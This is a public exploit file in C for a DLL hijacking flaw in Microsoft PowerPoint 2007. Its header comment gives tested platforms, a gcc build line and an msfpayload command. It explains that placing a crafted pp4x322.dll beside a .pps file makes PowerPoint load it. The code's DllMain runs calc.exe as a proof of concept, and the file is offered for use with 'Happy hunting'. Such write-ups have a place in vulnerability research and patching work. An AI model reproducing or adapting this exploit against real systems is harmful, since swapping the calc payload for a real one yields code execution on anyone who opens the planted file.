/*

Exploit Title: Microsoft Windows Power Point 2007 DLL Hijacking Exploit (pp4x322.dll)
Date: August 25, 2010
Author: monstream00 (monstream00 [at} hotmail.com) 
Software Link: http://office.microsoft.com/en-us/
Modified storm's exploit for pp4x322.dll and used Rapid7 write up to find. Happy hunting.

Rapid7 write up: http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html

Tested on: Windows 7 64bit, XP SP3 with MS Office PowerPoint 2007 SP2 MSO 12.0.6535.5002

http://monstream00.wordpress.com/

  gcc -shared -o pp4x322.dll powerpoint2007-DLL.c
  or
  msfpayload windows/exec CMD=calc.exe D > pp4x322.dll

  .pps file affected.

Power Point looks for pp4x322.dll in same directory as the .pps extension and loads the DLL. This will not work with real .pps but will work with a text file if extension is changed to a .pps instead of .txt. I have tested it on Windows 7 64bit and it works. Rapid 7 has a great article on DLL Hijacking and it is a must read.
*/

#include <windows.h>

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  hax();
  return 0;
}